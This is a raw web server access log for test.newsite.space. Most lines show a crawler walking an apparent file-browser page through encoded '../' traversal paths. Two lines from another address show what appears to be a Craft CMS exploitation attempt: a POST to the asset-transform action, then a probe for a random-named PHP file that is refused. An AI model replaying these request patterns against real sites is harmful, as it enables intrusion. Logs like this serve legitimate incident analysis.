216.73.216.46 - - [21/Aug/2025:13:52:09 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fmodules%2F..%2Fvendor%2Ftheiconic HTTP/2.0" 200 1410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 115 0.004 "6983" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:52:12 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Fassets%2F..%2Fpixelandtonic HTTP/2.0" 200 1412 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 117 0.003 "7007" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:52:15 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F3013a1e4%2F..%2F7683ad58 HTTP/2.0" 200 1541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.004 "10279" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:52:18 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F.%2Fc57df74c%2F..%2Ff7099225 HTTP/2.0" 200 1511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 118 0.004 "8319" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:52:21 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2Fe3294a7e%2F..%2Fe9e49845%2F.. HTTP/2.0" 200 2391 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 129 0.005 "63659" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:52:24 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F.%2F12dd9%2F..%2F28e2e3a3 HTTP/2.0" 200 1497 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 115 0.005 "8257" "0.004" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:13:52:25 -0400] "POST /index.php?p=actions/assets/generate-transform HTTP/2.0" 200 126 "https://test.newsite.space/admin/login" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:46.0) Gecko/20100101 Firefox/46.0" "213.176.73.78" 1341 0.426 "157" "0.427" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:52:27 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F.%2F12dd9%2F..%2F5d88fcbb HTTP/2.0" 200 1502 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 116 0.003 "8296" "0.003" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:13:52:28 -0400] "GET /c057546adf31.php HTTP/2.0" 403 449 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:46.0) Gecko/20100101 Firefox/46.0" "213.176.73.78" 1067 0.001 "859" "0.001" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:52:30 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2Fc57df74c%2F..%2F60b5d681 HTTP/2.0" 200 1517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 124 0.005 "8540" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:52:33 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fgraham-campbell%2F..%2Fdoctrine HTTP/2.0" 200 1446 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.005 "8878" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:52:36 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F.%2Fc57df74c%2F..%2Faac2e380 HTTP/2.0" 200 1612 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 117 0.005 "12077" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:52:39 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2F.%2Fvendor%2Fgraham-campbell%2F..%2Fwebonyx HTTP/2.0" 200 1412 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 113 0.003 "6865" "0.003" "test.newsite.space"
